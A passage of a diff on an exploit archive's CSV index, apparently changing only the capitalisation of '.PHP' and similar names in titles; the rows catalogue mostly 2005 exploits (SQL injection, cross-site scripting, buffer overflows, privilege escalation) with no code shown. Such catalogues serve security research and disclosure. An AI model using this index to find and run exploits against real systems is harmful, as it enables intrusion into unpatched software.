Vulnerabilities",2005-03-20,"Luigi Auriemma",windows,dos,0 25256,platforms/osx/local/25256.c,"Apple Mac OS X 10.3.x - Multiple Vulnerabilities",2005-03-21,V9,osx,local,0 -25257,platforms/php/webapps/25257.txt,"Kayako ESupport 2.3 Index.PHP Multiple Parameter Cross-Site Scripting Vulnerability",2005-03-22,"James Bercegay",php,webapps,0 +25257,platforms/php/webapps/25257.txt,"Kayako ESupport 2.3 Index.php Multiple Parameter Cross-Site Scripting Vulnerability",2005-03-22,"James Bercegay",php,webapps,0 25258,platforms/php/webapps/25258.txt,"Phorum 3.x/5.0.x HTTP Response Splitting Vulnerability",2005-03-22,"Alexander Anisimov",php,webapps,0 25259,platforms/windows/dos/25259.py,"Microsoft Windows XP Local Denial of Service Vulnerability",2005-03-22,liquid@cyberspace.org,windows,dos,0 25260,platforms/php/webapps/25260.txt,"Vortex Portal 2.0 index.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0 @@ -22407,13 +22407,13 @@ id,file,description,date,author,platform,type,port 25267,platforms/php/webapps/25267.txt,"Invision Power Board 1.x/2.0 HTML Injection Vulnerability",2005-03-23,"Woody Hughes",php,webapps,0 25268,platforms/windows/dos/25268.txt,"Microsoft Windows XP - TSShutdn.exe Remote Denial of Service Vulnerability",2005-03-23,"Juha-Matti Laurio",windows,dos,0 25269,platforms/jsp/webapps/25269.txt,"Oracle Reports Server 10g Multiple Remote Cross-Site Scripting Vulnerabilities",2005-03-24,Paolo,jsp,webapps,0 -25270,platforms/php/webapps/25270.txt,"Topic Calendar 1.0.1 Calendar_Scheduler.PHP Cross-Site Scripting Vulnerability",2004-03-24,"Alberto Trivero",php,webapps,0 +25270,platforms/php/webapps/25270.txt,"Topic Calendar 1.0.1 Calendar_Scheduler.php Cross-Site Scripting Vulnerability",2004-03-24,"Alberto Trivero",php,webapps,0 25271,platforms/php/webapps/25271.txt,"Double Choco Latte 0.9.3/0.9.4 main.php Arbitrary PHP Code Execution",2005-03-24,"James Bercegay",php,webapps,0 -25272,platforms/php/webapps/25272.txt,"Dream4 Koobi CMS 4.2.3 Index.PHP Cross-Site Scripting Vulnerability",2005-03-24,mircia,php,webapps,0 -25273,platforms/php/webapps/25273.txt,"Dream4 Koobi CMS 4.2.3 Index.PHP SQL Injection Vulnerability",2005-03-24,mircia,php,webapps,0 +25272,platforms/php/webapps/25272.txt,"Dream4 Koobi CMS 4.2.3 Index.php Cross-Site Scripting Vulnerability",2005-03-24,mircia,php,webapps,0 +25273,platforms/php/webapps/25273.txt,"Dream4 Koobi CMS 4.2.3 Index.php SQL Injection Vulnerability",2005-03-24,mircia,php,webapps,0 25274,platforms/windows/remote/25274.html,"Maxthon Web Browser 1.2 - Search Bar Information Disclosure Vulnerability",2005-03-25,"Aviv Raff",windows,remote,0 25275,platforms/linux/remote/25275.c,"Smail-3 - Multiple Remote and Local Vulnerabilities",2005-03-25,infamous42md,linux,remote,0 -25276,platforms/php/webapps/25276.txt,"PHPMyDirectory 10.1.3 Review.PHP Multiple Parameter Cross-Site Scripting Vulnerability",2005-03-25,mircia,php,webapps,0 +25276,platforms/php/webapps/25276.txt,"PHPMyDirectory 10.1.3 Review.php Multiple Parameter Cross-Site Scripting Vulnerability",2005-03-25,mircia,php,webapps,0 25277,platforms/hardware/dos/25277.txt,"Netcomm NB1300 Modem/Router Remote Denial of Service Vulnerability",2005-03-25,"Chris Rock",hardware,dos,0 25278,platforms/php/webapps/25278.sh,"ESMI PayPal Storefront 1.7 pages.php idpages Parameter SQL Injection",2005-03-26,Dcrab,php,webapps,0 25279,platforms/php/webapps/25279.txt,"ESMI PayPal Storefront 1.7 products1.php id2 Parameter SQL Injection",2005-03-26,Dcrab,php,webapps,0 @@ -22466,20 +22466,20 @@ id,file,description,date,author,platform,type,port 25327,platforms/php/webapps/25327.txt,"AlstraSoft EPay Pro 2.0 - Remote File Include Vulnerability",2005-04-01,Dcrab,php,webapps,0 25328,platforms/php/webapps/25328.txt,"AlstraSoft EPay Pro 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-04-01,Dcrab,php,webapps,0 25329,platforms/windows/dos/25329.cfg,"Star Wars Jedi Knight: Jedi Academy 1.0.11 - Buffer Overflow Vulnerability",2005-04-02,"Luigi Auriemma",windows,dos,0 -25330,platforms/php/webapps/25330.txt,"PHPMyAdmin 2.x Convcharset Cross-Site Scripting Vulnerability",2005-04-03,"Oriol Torrent Santiago",php,webapps,0 +25330,platforms/php/webapps/25330.txt,"phpMyAdmin 2.x - Convcharset Cross-Site Scripting Vulnerability",2005-04-03,"Oriol Torrent Santiago",php,webapps,0 25331,platforms/cgi/webapps/25331.txt,"SonicWALL SOHO 5.1.7 Web Interface Multiple Remote Input Validation Vulnerabilities",2005-04-04,"Oliver Karow",cgi,webapps,0 25332,platforms/asp/webapps/25332.txt,"SiteEnable SQL Injection Vulnerability",2005-04-02,Zinho,asp,webapps,0 25333,platforms/unix/local/25333.c,"SCO OpenServer 5.0.6/5.0.7 NWPrint Command Line Argument Local Buffer Overflow Vulnerability",2005-04-04,"pasquale minervini",unix,local,0 25334,platforms/linux/dos/25334.txt,"Mozilla Suite/Firefox JavaScript Lambda Replace Heap Memory Disclosure Vulnerability",2005-04-04,"Daniel McNeil",linux,dos,0 25335,platforms/unix/remote/25335.txt,"IBM iSeries AS400 LDAP Server Remote Information Disclosure Vulnerability",2005-04-04,"Shalom Carmel",unix,remote,0 25336,platforms/windows/remote/25336.txt,"Logics Software LOG-FT Arbitrary File Disclosure Vulnerability",2005-04-05,"Pedro Viuales and Rom Ramirez",windows,remote,0 -25337,platforms/php/webapps/25337.txt,"ProfitCode Software PayProCart 3.0 Usrdetails.PHP Cross-Site Scripting Vulnerability",2005-04-05,"Diabolic Crab",php,webapps,0 +25337,platforms/php/webapps/25337.txt,"ProfitCode Software PayProCart 3.0 Usrdetails.php Cross-Site Scripting Vulnerability",2005-04-05,"Diabolic Crab",php,webapps,0 25338,platforms/php/webapps/25338.txt,"profitcode software payprocart 3.0 - Directory Traversal Vulnerability",2005-04-05,"Diabolic Crab",php,webapps,0 25339,platforms/php/webapps/25339.txt,"PHP-Nuke 6.x/7.x Your_Account Module Username Cross-Site Scripting Vulnerability",2005-04-05,sp3x@securityreason.com,php,webapps,0 25340,platforms/php/webapps/25340.txt,"PHP-Nuke 6.x/7.x Your_Account Module Avatarcategory Cross-Site Scripting Vulnerability",2005-04-05,sp3x@securityreason.com,php,webapps,0 25341,platforms/php/webapps/25341.html,"PHP-Nuke 6.x/7.x Downloads Module Lid Parameter Cross-Site Scripting Vulnerability",2005-04-05,sp3x@securityreason.com,php,webapps,0 25342,platforms/php/webapps/25342.txt,"PHP-Nuke 7.6 Web_Links Module Multiple Cross-Site Scripting Vulnerabilities",2005-04-06,"Maksymilian Arciemowicz",php,webapps,0 -25343,platforms/php/webapps/25343.txt,"PHP-Nuke 7.6 Banners.PHP Cross-Site Scripting Vulnerability",2005-04-06,"Maksymilian Arciemowicz",php,webapps,0 +25343,platforms/php/webapps/25343.txt,"PHP-Nuke 7.6 Banners.php Cross-Site Scripting Vulnerability",2005-04-06,"Maksymilian Arciemowicz",php,webapps,0 25344,platforms/php/webapps/25344.txt,"PHPBB 2.0.13 DLMan Pro Module SQL Injection Vulnerability",2005-04-06,"LovER BOY",php,webapps,0 25345,platforms/php/webapps/25345.txt,"PHPBB 2.0.13 Linkz Pro Module SQL Injection Vulnerability",2005-04-06,"LovER BOY",php,webapps,0 25346,platforms/asp/webapps/25346.txt,"Active Auction House Default.ASP Multiple SQL Injection Vulnerabilities",2005-04-06,Dcrab,asp,webapps,0 @@ -22512,13 +22512,13 @@ id,file,description,date,author,platform,type,port 25373,platforms/php/webapps/25373.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - view.php id Parameter XSS",2005-04-09,kre0n,php,webapps,0 25374,platforms/php/webapps/25374.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - view.php id Parameter SQL Injection",2005-04-09,kre0n,php,webapps,0 25375,platforms/linux/remote/25375.pl,"KDE KMail 1.7.1 HTML EMail Remote Email Content Spoofing Vulnerability",2005-04-11,"Noam Rathaus",linux,remote,0 -25376,platforms/php/webapps/25376.txt,"ModernGigabyte ModernBill 4.3 News.PHP File Include Vulnerability",2005-04-10,"James Bercegay",php,webapps,0 +25376,platforms/php/webapps/25376.txt,"ModernGigabyte ModernBill 4.3 News.php File Include Vulnerability",2005-04-10,"James Bercegay",php,webapps,0 25377,platforms/php/webapps/25377.txt,"ModernGigabyte ModernBill 4.3 C_CODE Parameter Cross-Site Scripting Vulnerability",2005-04-11,"James Bercegay",php,webapps,0 25378,platforms/php/webapps/25378.txt,"ModernGigabyte ModernBill 4.3 Aid Parameter Cross-Site Scripting Vulnerability",2005-04-11,"James Bercegay",php,webapps,0 -25379,platforms/php/webapps/25379.txt,"Zoom Media Gallery 2.1.2 Index.PHP SQL Injection Vulnerability",2005-04-11,"Andreas Constantinides",php,webapps,0 +25379,platforms/php/webapps/25379.txt,"Zoom Media Gallery 2.1.2 Index.php SQL Injection Vulnerability",2005-04-11,"Andreas Constantinides",php,webapps,0 25380,platforms/php/webapps/25380.txt,"Invision Power Board 1.x ST Parameter SQL Injection Vulnerability",2005-04-11,Dcrab,php,webapps,0 25381,platforms/php/webapps/25381.txt,"WebCT Discussion Board 4.1 HTML Injection Vulnerability",2005-04-11,lacertosum,php,webapps,0 -25382,platforms/php/webapps/25382.txt,"JPortal 2.3.1 Banner.PHP SQL Injection Vulnerability",2005-04-11,CiNU5,php,webapps,0 +25382,platforms/php/webapps/25382.txt,"JPortal 2.3.1 Banner.php SQL Injection Vulnerability",2005-04-11,CiNU5,php,webapps,0 25383,platforms/windows/dos/25383.pl,"Microsoft Windows 2000/XP Internet Protocol Validation Remote Code Execution Vulnerability (1)",2005-04-12,"Song Liu",windows,dos,0 25384,platforms/windows/remote/25384.c,"Microsoft Windows 2000/XP Internet Protocol Validation Remote Code Execution Vulnerability (2)",2005-04-16,"Yuri Gushin",windows,remote,0 25385,platforms/windows/remote/25385.cpp,"Microsoft Internet Explorer 5.0.1 Content Advisor File Handling Buffer Overflow Vulnerability",2005-04-12,"Miguel Tarasc",windows,remote,0 @@ -22527,20 +22527,20 @@ id,file,description,date,author,platform,type,port 25388,platforms/multiple/dos/25388.txt,"Multiple Vendor ICMP Implementation Malformed Path MTU DoS",2005-04-12,"Fernando Gont",multiple,dos,0 25389,platforms/multiple/dos/25389.txt,"Multiple Vendor ICMP Message Handling DoS",2005-04-12,"Fernando Gont",multiple,dos,0 25390,platforms/asp/webapps/25390.txt,"Comersus Cart 4.0/5.0 Comersus_Search_Item.ASP Cross-Site Scripting Vulnerability",2005-04-12,Lostmon,asp,webapps,0 -25391,platforms/multiple/remote/25391.txt,"XAMPP Phonebook.PHP Multiple Remote HTML Injection Vulnerabilities",2005-04-12,"Morning Wood",multiple,remote,0 +25391,platforms/multiple/remote/25391.txt,"XAMPP Phonebook.php Multiple Remote HTML Injection Vulnerabilities",2005-04-12,"Morning Wood",multiple,remote,0 25392,platforms/linux/remote/25392.c,"Salim Gasmi GLD 1.x Postfix Greylisting Daemon Buffer Overflow Vulnerability",2005-04-12,Xpl017Elz,linux,remote,0 25393,platforms/multiple/dos/25393.txt,"XAMPP Insecure Default Password Disclosure Vulnerability",2005-04-12,"Morning Wood",multiple,dos,0 -25394,platforms/php/webapps/25394.txt,"Pinnacle Cart Index.PHP Cross-Site Scripting Vulnerability",2005-04-12,SmOk3,php,webapps,0 +25394,platforms/php/webapps/25394.txt,"Pinnacle Cart Index.php Cross-Site Scripting Vulnerability",2005-04-12,SmOk3,php,webapps,0 25395,platforms/multiple/remote/25395.txt,"Sun JavaMail 1.3.2 MimeBodyPart.getFileName Directory Traversal Vulnerability",2005-04-12,"Rafael San Miguel Carrasco",multiple,remote,0 25396,platforms/multiple/remote/25396.txt,"Oracle 8.x/9.x/10.x Database Multiple SQL Injection Vulnerabilities",2005-04-13,"Esteban Martinez Fayo",multiple,remote,0 25397,platforms/multiple/remote/25397.txt,"Oracle Database 10.1 MDSYS.MD2.SDO_CODE_SIZE Buffer Overflow Vulnerability",2005-04-13,"Esteban Martinez Fayo",multiple,remote,0 -25398,platforms/php/webapps/25398.txt,"PHPBB2 Plus 1.5 GroupCP.PHP Cross-Site Scripting Vulnerability",2005-04-13,Dcrab,php,webapps,0 -25399,platforms/php/webapps/25399.txt,"PHPBB2 Plus 1.5 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2005-04-13,Dcrab,php,webapps,0 -25400,platforms/php/webapps/25400.txt,"PHPBB2 Plus 1.5 Portal.PHP Multiple Cross-Site Scripting Vulnerabilities",2005-04-13,Dcrab,php,webapps,0 -25401,platforms/php/webapps/25401.txt,"PHPBB2 Plus 1.5 ViewTopic.PHP Cross-Site Scripting Vulnerability",2005-04-13,Dcrab,php,webapps,0 +25398,platforms/php/webapps/25398.txt,"PHPBB2 Plus 1.5 GroupCP.php Cross-Site Scripting Vulnerability",2005-04-13,Dcrab,php,webapps,0 +25399,platforms/php/webapps/25399.txt,"PHPBB2 Plus 1.5 Index.php Multiple Cross-Site Scripting Vulnerabilities",2005-04-13,Dcrab,php,webapps,0 +25400,platforms/php/webapps/25400.txt,"PHPBB2 Plus 1.5 Portal.php Multiple Cross-Site Scripting Vulnerabilities",2005-04-13,Dcrab,php,webapps,0 +25401,platforms/php/webapps/25401.txt,"PHPBB2 Plus 1.5 ViewTopic.php Cross-Site Scripting Vulnerability",2005-04-13,Dcrab,php,webapps,0 25402,platforms/hardware/dos/25402.txt,"LG U8120 Mobile Phone MIDI File Remote Denial of Service Vulnerability",2005-04-13,"Luca Ercoli",hardware,dos,0 -25403,platforms/php/webapps/25403.txt,"PHPBB Photo Album 2.0.53 Module Album_Cat.PHP Cross-Site Scripting Vulnerability",2005-04-13,Dcrab,php,webapps,0 -25404,platforms/php/webapps/25404.txt,"PHPBB Photo Album Module 2.0.53 Album_Comment.PHP Cross-Site Scripting Vulnerability",2005-04-13,Dcrab,php,webapps,0 +25403,platforms/php/webapps/25403.txt,"PHPBB Photo Album 2.0.53 Module Album_Cat.php Cross-Site Scripting Vulnerability",2005-04-13,Dcrab,php,webapps,0 +25404,platforms/php/webapps/25404.txt,"PHPBB Photo Album Module 2.0.53 Album_Comment.php Cross-Site Scripting Vulnerability",2005-04-13,Dcrab,php,webapps,0 25405,platforms/php/webapps/25405.txt,"GetSimpleCMS 3.2.1 - Arbitrary File Upload Vulnerability",2013-05-13,"Ahmed Elhady Mohamed",php,webapps,0 25406,platforms/linux/local/25406.sh,"Kloxo 6.1.6 - Local Privilege Escalation",2013-05-13,HTP,linux,local,0 25408,platforms/windows/dos/25408.pl,"Windows Media Player 11.0.0 - (.wav) Crash PoC",2013-05-13,Asesino04,windows,dos,0 @@ -22557,8 +22557,8 @@ id,file,description,date,author,platform,type,port 25419,platforms/windows/local/25419.pl,"Adrenalin Player 2.2.5.3 - (.m3u) Buffer Overflow Exploit (SEH)",2013-05-13,seaofglass,windows,local,0 25420,platforms/multiple/remote/25420.txt,"IBM WebSphere 5.0/5.1/6.0 Application Server Web Server Root JSP Source Code Disclosure Vulnerability",2005-04-13,"SPI Labs",multiple,remote,0 25421,platforms/windows/remote/25421.txt,"RSA Security RSA Authentication Agent For Web 5.2 - Remote Cross-Site Scripting Vulnerability",2005-04-15,"Oliver Karow",windows,remote,0 -25422,platforms/php/webapps/25422.txt,"All4WWW-HomePageCreator 1.0 Index.PHP Arbitrary Remote File Include Vulnerability",2005-04-14,"Francisco Alisson",php,webapps,0 -25423,platforms/php/webapps/25423.txt,"SPHPBlog 0.4 - Search.PHP Cross-Site Scripting Vulnerability",2005-04-14,y3dips,php,webapps,0 +25422,platforms/php/webapps/25422.txt,"All4WWW-HomePageCreator 1.0 Index.php Arbitrary Remote File Include Vulnerability",2005-04-14,"Francisco Alisson",php,webapps,0 +25423,platforms/php/webapps/25423.txt,"SPHPBlog 0.4 - Search.php Cross-Site Scripting Vulnerability",2005-04-14,y3dips,php,webapps,0 25424,platforms/asp/webapps/25424.txt,"OneWorldStore OWAddItem.ASP SQL Injection Vulnerability",2005-04-14,Dcrab,asp,webapps,0 25425,platforms/asp/webapps/25425.txt,"OneWorldStore OWListProduct.ASP Multiple SQL Injection Vulnerabilities",2005-04-14,Dcrab,asp,webapps,0 25426,platforms/asp/shellcode/25426.txt,"OneWorldStore OWProductDetail.ASP SQL Injection Vulnerability",2005-04-14,Dcrab,asp,shellcode,0 @@ -22567,8 +22567,8 @@ id,file,description,date,author,platform,type,port 25429,platforms/linux/dos/25429.c,"Libsafe 2.0 Multi-threaded Process Race Condition Security Bypass Weakness",2005-04-15,Overflow.pl,linux,dos,0 25430,platforms/php/webapps/25430.txt,"PHP-Nuke 7.6 Surveys Module HTTP Response Splitting Vulnerability",2005-04-15,Dcrab,php,webapps,0 25431,platforms/php/webapps/25431.pl,"Ariadne CMS 2.4 - Remote File Include Vulnerability",2006-10-19,"Fidel Costa",php,webapps,0 -25432,platforms/php/webapps/25432.txt,"PHPBB Remote Mod.PHP SQL Injection Vulnerability",2005-04-16,"tom cruise",php,webapps,0 -25433,platforms/php/webapps/25433.txt,"Datenbank Module For PHPBB Remote Mod.PHP Cross-Site Scripting Vulnerability",2005-04-16,"tom cruise",php,webapps,0 +25432,platforms/php/webapps/25432.txt,"PHPBB Remote Mod.php SQL Injection Vulnerability",2005-04-16,"tom cruise",php,webapps,0 +25433,platforms/php/webapps/25433.txt,"Datenbank Module For PHPBB Remote Mod.php Cross-Site Scripting Vulnerability",2005-04-16,"tom cruise",php,webapps,0 25434,platforms/php/webapps/25434.txt,"eGroupWare 1.0 index.php Multiple Parameter XSS",2005-04-18,"GulfTech Security",php,webapps,0 25435,platforms/php/webapps/25435.txt,"eGroupWare 1.0 sitemgr-site/index.php category_id Parameter XSS",2005-04-18,"GulfTech Security",php,webapps,0 25436,platforms/php/webapps/25436.txt,"eGroupWare 1.0 tts/index.php filter Parameter SQL Injection",2005-04-18,"GulfTech Security",php,webapps,0 @@ -22586,26 +22586,26 @@ id,file,description,date,author,platform,type,port 25448,platforms/windows/local/25448.rb,"ERS Viewer 2011 ERS File Handling Buffer Overflow",2013-05-14,metasploit,windows,local,0 25449,platforms/php/webapps/25449.txt,"UMI.CMS 2.9 - CSRF Vulnerability",2013-05-14,"High-Tech Bridge SA",php,webapps,0 25450,platforms/linux/local/25450.c,"Linux Kernel < 3.8.x - open-time Capability file_ns_capable() Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0 -25451,platforms/php/webapps/25451.txt,"PHPBB 1.x/2.0.x Knowledge Base Module KB.PHP SQL Injection Vulnerability",2005-04-13,deluxe@security-project.org,php,webapps,0 +25451,platforms/php/webapps/25451.txt,"PHPBB 1.x/2.0.x Knowledge Base Module KB.php SQL Injection Vulnerability",2005-04-13,deluxe@security-project.org,php,webapps,0 25452,platforms/multiple/remote/25452.pl,"Oracle 10g Database SUBSCRIPTION_NAME Remote SQL Injection Vulnerability (1)",2007-02-23,bunker,multiple,remote,0 25453,platforms/multiple/remote/25453.pl,"Oracle 10g Database SUBSCRIPTION_NAME Remote SQL Injection Vulnerability (2)",2007-02-26,bunker,multiple,remote,0 25454,platforms/windows/remote/25454.txt,"Microsoft Windows 98/2000 Explorer Preview Pane Script Injection Vulnerability",2005-04-19,"GreyMagic Software",windows,remote,0 25455,platforms/asp/webapps/25455.txt,"OneWorldStore DisplayResults.ASP SQL Injection Vulnerability",2005-04-19,Lostmon,asp,webapps,0 25456,platforms/asp/webapps/25456.txt,"OneWorldStore DisplayResults.ASP Cross-Site Scripting Vulnerability",2005-04-19,Lostmon,asp,webapps,0 -25457,platforms/php/webapps/25457.c,"UBBCentral 6.0 UBB.threads Printthread.PHP SQL Injection Vulnerability",2005-03-11,HLL,php,webapps,0 -25458,platforms/php/webapps/25458.txt,"CityPost PHP LNKX 52.0 Message.PHP Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0 +25457,platforms/php/webapps/25457.c,"UBBCentral 6.0 UBB.threads Printthread.php SQL Injection Vulnerability",2005-03-11,HLL,php,webapps,0 +25458,platforms/php/webapps/25458.txt,"CityPost PHP LNKX 52.0 Message.php Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0 25459,platforms/php/webapps/25459.txt,"CityPost PHP Image Editor M1/M2/M3/Imgsrc/M4 - URI Parameter Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0 -25464,platforms/php/webapps/25464.txt,"CityPost Simple PHP Upload Simple-upload-53.PHP Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0 +25464,platforms/php/webapps/25464.txt,"CityPost Simple PHP Upload Simple-upload-53.php Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0 25465,platforms/linux/dos/25465.txt,"Logwatch 2.6 Secure Script Denial of Service Vulnerability",2005-04-20,anonymous,linux,dos,0 25466,platforms/asp/webapps/25466.txt,"ECommPro 3.0 - Admin/Login.ASP SQL Injection Vulnerability",2005-04-20,c0d3r,asp,webapps,0 -25467,platforms/php/webapps/25467.txt,"Netref 4.2 Cat_for_gen.PHP Remote PHP Script Injection Vulnerability",2005-04-20,jaguar,php,webapps,0 +25467,platforms/php/webapps/25467.txt,"Netref 4.2 Cat_for_gen.php Remote PHP Script Injection Vulnerability",2005-04-20,jaguar,php,webapps,0 25468,platforms/php/webapps/25468.txt,"PHP Labs proFile Dir URI Variable Cross-Site Scripting Vulnerability",2005-04-20,sNKenjoi,php,webapps,0 25469,platforms/php/webapps/25469.txt,"Ocean12 Calendar Manager 1.0 Admin Form SQL Injection Vulnerability",2005-04-20,Zinho,php,webapps,0 25470,platforms/multiple/dos/25470.txt,"Neslo Desktop Rover 3.0 Malformed Packet Remote Denial of Service Vulnerability",2005-04-20,"Adam Baldwin",multiple,dos,0 25472,platforms/windows/dos/25472.py,"Serva 32 TFTP 2.1.0 - Buffer Overflow Denial of Service",2013-05-15,Sapling,windows,dos,0 25473,platforms/php/webapps/25473.txt,"PHP Labs proFile File URI Variable Cross-Site Scripting Vulnerability",2005-04-20,sNKenjoi,php,webapps,0 -25474,platforms/php/webapps/25474.txt,"PHPBB-Auction Module 1.0/1.2 Auction_Rating.PHP SQL Injection Vulnerability",2005-04-20,sNKenjoi,php,webapps,0 -25475,platforms/php/webapps/25475.txt,"PHPBB-Auction Module 1.0/1.2 Auction_Offer.PHP SQL Injection Vulnerability",2005-04-20,sNKenjoi,php,webapps,0 +25474,platforms/php/webapps/25474.txt,"PHPBB-Auction Module 1.0/1.2 Auction_Rating.php SQL Injection Vulnerability",2005-04-20,sNKenjoi,php,webapps,0 +25475,platforms/php/webapps/25475.txt,"PHPBB-Auction Module 1.0/1.2 Auction_Offer.php SQL Injection Vulnerability",2005-04-20,sNKenjoi,php,webapps,0 25476,platforms/asp/webapps/25476.txt,"DUportal Pro 3.4 default.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25477,platforms/asp/webapps/25477.txt,"DUportal Pro 3.4 - search.asp iChannel Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25478,platforms/asp/webapps/25478.txt,"DUportal Pro 3.4 inc_vote.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 @@ -22633,7 +22633,7 @@ id,file,description,date,author,platform,type,port 25500,platforms/asp/webapps/25500.txt,"ASPNuke 0.80 Detail.ASP SQL Injection Vulnerability",2005-04-22,Dcrab,asp,webapps,0 25501,platforms/asp/webapps/25501.txt,"ASPNuke 0.80 Profile.ASP Cross-Site Scripting Vulnerability",2005-04-22,Dcrab,asp,webapps,0 25502,platforms/asp/webapps/25502.txt,"ASPNuke 0.80 Select.ASP Cross-Site Scripting Vulnerability",2005-04-22,Dcrab,asp,webapps,0 -25503,platforms/php/webapps/25503.txt,"WoltLab Burning Board 2.3.1 Thread.PHP Cross-Site Scripting Vulnerability",2005-04-22,deluxe89,php,webapps,0 +25503,platforms/php/webapps/25503.txt,"WoltLab Burning Board 2.3.1 Thread.php Cross-Site Scripting Vulnerability",2005-04-22,deluxe89,php,webapps,0 25504,platforms/asp/webapps/25504.txt,"Black Knight Forum 4.0 Member.ASP SQL Injection Vulnerability",2005-04-23,Dcrab,asp,webapps,0 25505,platforms/asp/webapps/25505.txt,"Black Knight Forum 4.0 Forum.ASP SQL Injection Vulnerability",2005-04-23,Dcrab,asp,webapps,0 25506,platforms/asp/webapps/25506.txt,"CartWIZ 1.10 AddToCart.ASP SQL Injection Vulnerability",2005-04-23,Dcrab,asp,webapps,0 @@ -22653,12 +22653,12 @@ id,file,description,date,author,platform,type,port 25520,platforms/asp/webapps/25520.txt,"CartWIZ 1.10 Login.ASP Message Argument Cross-Site Scripting Vulnerability",2005-04-23,Dcrab,asp,webapps,0 25521,platforms/asp/webapps/25521.txt,"CartWIZ 1.10 - SearchResults.ASP SKU Argument Cross-Site Scripting Vulnerability",2005-04-23,Dcrab,asp,webapps,0 25522,platforms/asp/webapps/25522.txt,"CartWIZ 1.10 - SearchResults.ASP Name Argument Cross-Site Scripting Vulnerability",2005-04-23,Dcrab,asp,webapps,0 -25523,platforms/php/webapps/25523.txt,"PHPBB 2.0.x Profile.PHP Cross-Site Scripting Vulnerability",2005-04-23,HaCkZaTaN,php,webapps,0 -25524,platforms/php/webapps/25524.txt,"PHPBB 2.0.x Viewtopic.PHP Cross-Site Scripting Vulnerability",2005-04-23,HaCkZaTaN,php,webapps,0 +25523,platforms/php/webapps/25523.txt,"PHPBB 2.0.x Profile.php Cross-Site Scripting Vulnerability",2005-04-23,HaCkZaTaN,php,webapps,0 +25524,platforms/php/webapps/25524.txt,"PHPBB 2.0.x Viewtopic.php Cross-Site Scripting Vulnerability",2005-04-23,HaCkZaTaN,php,webapps,0 25525,platforms/linux/dos/25525.c,"Affix Bluetooth Protocol Stack 3.1/3.2 Signed Buffer Index Vulnerability (1)",2005-04-25,kf,linux,dos,0 25526,platforms/linux/remote/25526.c,"Affix Bluetooth Protocol Stack 3.1/3.2 Signed Buffer Index Vulnerability (2)",2005-04-25,kf,linux,remote,0 25527,platforms/linux/dos/25527.txt,"ImageMagick 6.x PNM Image Decoding Remote Buffer Overflow Vulnerability",2005-04-25,"Damian Put",linux,dos,0 -25528,platforms/php/webapps/25528.txt,"WoltLab Burning Board 2.3.1 PMS.PHP Cross-Site Scripting Vulnerability",2005-04-25,deluxe89,php,webapps,0 +25528,platforms/php/webapps/25528.txt,"WoltLab Burning Board 2.3.1 PMS.php Cross-Site Scripting Vulnerability",2005-04-25,deluxe89,php,webapps,0 25529,platforms/asp/webapps/25529.txt,"StorePortal 2.63 Default.ASP Multiple SQL Injection Vulnerabilities",2005-04-25,Dcrab,asp,webapps,0 25530,platforms/asp/webapps/25530.txt,"OneWorldStore IDOrder Information Disclosure Vulnerability",2005-04-25,Lostmon,asp,webapps,0 25531,platforms/php/webapps/25531.html,"PHPMyVisites 1.3 Set_Lang File Include Vulnerability",2005-04-26,"Max Cerny",php,webapps,0 @@ -22668,7 +22668,7 @@ id,file,description,date,author,platform,type,port 25535,platforms/php/webapps/25535.txt,"Invision Power Board 2.0.1 QPid Parameter SQL Injection Vulnerability",2005-04-26,SVT,php,webapps,0 25536,platforms/asp/webapps/25536.txt,"MetaCart E-Shop V-8 IntProdID Parameter Remote SQL Injection Vulnerability",2005-04-26,Dcrab,asp,webapps,0 25537,platforms/asp/webapps/25537.txt,"MetaCart E-Shop V-8 StrCatalog_NAME Parameter Remote SQL Injection Vulnerability",2005-04-26,Dcrab,asp,webapps,0 -25538,platforms/php/webapps/25538.txt,"GrayCMS 1.1 Error.PHP Remote File Include Vulnerability",2005-04-26,Kold,php,webapps,0 +25538,platforms/php/webapps/25538.txt,"GrayCMS 1.1 Error.php Remote File Include Vulnerability",2005-04-26,Kold,php,webapps,0 25539,platforms/asp/webapps/25539.txt,"MetaCart2 - IntCatalogID Parameter Remote SQL Injection Vulnerability",2005-04-26,Dcrab,asp,webapps,0 25540,platforms/asp/webapps/25540.txt,"MetaCart2 - StrSubCatalogID Parameter Remote SQL Injection Vulnerability",2005-04-26,Dcrab,asp,webapps,0 25541,platforms/asp/webapps/25541.txt,"MetaCart2 - CurCatalogID Parameter Remote SQL Injection Vulnerability",2005-04-26,Dcrab,asp,webapps,0 @@ -22685,12 +22685,12 @@ id,file,description,date,author,platform,type,port 25552,platforms/php/webapps/25552.txt,"Claroline 1.5/1.6 userInfo.php Multiple Parameter SQL Injection",2005-04-27,"Sieg Fried",php,webapps,0 25553,platforms/php/webapps/25553.txt,"Claroline 1.5/1.6 exercises_details.php exo_id Parameter SQL Injection",2005-04-27,"Sieg Fried",php,webapps,0 25554,platforms/windows/local/25554.c,"Altiris Client 6.0.88 - Service Local Privilege Escalation Vulnerability",2005-04-27,"Reed Arvin",windows,local,0 -25555,platforms/php/webapps/25555.txt,"Dream4 Koobi CMS 4.2.3 Index.PHP P Parameter SQL Injection Vulnerability",2005-04-27,"CENSORED Search Vulnerabilities",php,webapps,0 -25556,platforms/php/webapps/25556.txt,"Dream4 Koobi CMS 4.2.3 Index.PHP Q Parameter SQL Injection Vulnerability",2005-04-27,"CENSORED Search Vulnerabilities",php,webapps,0 +25555,platforms/php/webapps/25555.txt,"Dream4 Koobi CMS 4.2.3 Index.php P Parameter SQL Injection Vulnerability",2005-04-27,"CENSORED Search Vulnerabilities",php,webapps,0 +25556,platforms/php/webapps/25556.txt,"Dream4 Koobi CMS 4.2.3 Index.php Q Parameter SQL Injection Vulnerability",2005-04-27,"CENSORED Search Vulnerabilities",php,webapps,0 